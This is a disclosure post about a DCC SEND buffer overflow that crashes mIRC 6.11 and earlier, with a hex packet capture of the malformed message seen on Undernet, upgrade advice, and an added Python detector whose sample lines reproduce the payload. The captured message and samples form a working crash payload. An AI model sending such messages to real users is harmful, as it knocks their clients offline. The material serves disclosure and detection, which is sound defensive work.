Information and packet capture of the mIRC v6.11 and below DCC SEND buffer overflow exploit, which crashes the client.
b62cb9645cd0d4b5e6523993aae3f46bbb8843c464d881ef3029941da07d7097
Hi all, I just came in to work today and started sniffing a bit using ngrep
(http://www.packetfactory.net/projects/ngrep/). Guess what I've got?
Thousands of freaks (yeah, of course Undernet) using these fake DCCs, and
not only as private messages; this has taken the following form:
/msg #channel DCC SEND "shit....
Well, I'm making this public before it extends into an IRC virus, and I
encourage all the "asl pls,10x and lamers like these" to upgrade to
mIRC 6.12, and operators of channels should get this script
http://www.erler.org/Olathe/exploit%20fix.mrc, and of course modify it
for autoban
(I'm too lazy to do it). Below is your beloved packet.
T x.x.x.x:6667 -> x.x.x.x:1927 [AP]
3a 61 77 6a 66 64 67 61 64 21 73 74 31 40 xx xx :awjfdgad!st1@xx
2e xx xx 2e xx xx xx 2e xx xx 30 20 50 52 49 56 .xx.xxx.xxx PRIV
4d 53 47 20 4f 6d 69 4b 72 4f 6e 20 3a 01 44 43 MSG OmiKrOn :.DC
43 20 53 45 4e 44 20 22 61 20 61 20 61 20 61 20 C SEND "a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 22 20 31 30 37 39 30 39 35 38 34 38 a a " 1079095848
20 36 36 36 01 0d 0a 666...
I just cut all the IPs to keep it down.
Greetings #linuxsecurity (Undernet).
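
A defender-side check for the message shape shown in the capture above, as an added example that is not part of the original post and is not the linked .mrc script. It parses raw IRC lines and flags DCC SEND requests whose filename or arguments look like the captured one; the thresholds, the reason labels and the low-port heuristic are assumptions, since the post does not state the exact trigger condition.

```python
import re

# Assumed thresholds for this sketch; the post does not state the exact trigger.
MAX_NAME_LEN = 128
MAX_NAME_WORDS = 8

# The \x01 CTCP delimiter is optional here because the post also shows the
# message typed as plain text to a channel (/msg #channel DCC SEND ...).
PRIVMSG = re.compile(r"^:(?P<src>\S+) PRIVMSG (?P<target>\S+) :\x01?(?P<body>[^\x01]*)\x01?$")
DCC_SEND = re.compile(r'^DCC SEND (?:"(?P<q>[^"]*)"|(?P<u>\S+))(?P<rest>.*)$', re.I)
NUM = re.compile(r"[0-9]+")

def inspect(line):
    """Return (source, target, reasons) for a suspicious DCC SEND, else None."""
    m = PRIVMSG.match(line.rstrip("\r\n"))
    d = DCC_SEND.match(m["body"]) if m else None
    if not d:
        return None
    name = d["q"] if d["q"] is not None else d["u"]
    args = d["rest"].split()
    reasons = []
    if len(name) > MAX_NAME_LEN:
        reasons.append("long-filename")
    if len(name.split()) > MAX_NAME_WORDS:
        reasons.append("many-words")
    if m["target"].startswith(("#", "&")):
        reasons.append("sent-to-channel")
    # Expected shape: DCC SEND <file> <address> <port> [<size>]
    if len(args) < 2 or not all(NUM.fullmatch(a) for a in args):
        reasons.append("bad-args")  # also catches an unterminated quote
    elif 0 < int(args[1]) < 1024:
        reasons.append("low-port")  # heuristic: unusual for a DCC listener
    return (m["src"], m["target"], reasons) if reasons else None

# Constructed sample lines: the first mirrors the capture (hosts are placeholders).
FILLER = "a " * 134
SAMPLES = [
    ':awjfdgad!st1@host.example PRIVMSG OmiKrOn :\x01DCC SEND "' + FILLER + '" 1079095848 666\x01\r\n',
    ':nick!user@host.example PRIVMSG #channel :DCC SEND "' + FILLER + '" 1079095848 666\r\n',
    ':bob!b@host.example PRIVMSG alice :\x01DCC SEND notes.txt 3232235777 5000 1024\x01\r\n',
]

def scan(lines):
    """Inspect every line and keep only the flagged ones."""
    return [hit for hit in map(inspect, lines) if hit]

if __name__ == "__main__":
    for src, target, reasons in scan(SAMPLES):
        print(f"{src} -> {target}: {', '.join(reasons)}")
```

The same checks can drive a channel bot's autoban or an IDS rule; tune the thresholds against real traffic before acting on hits.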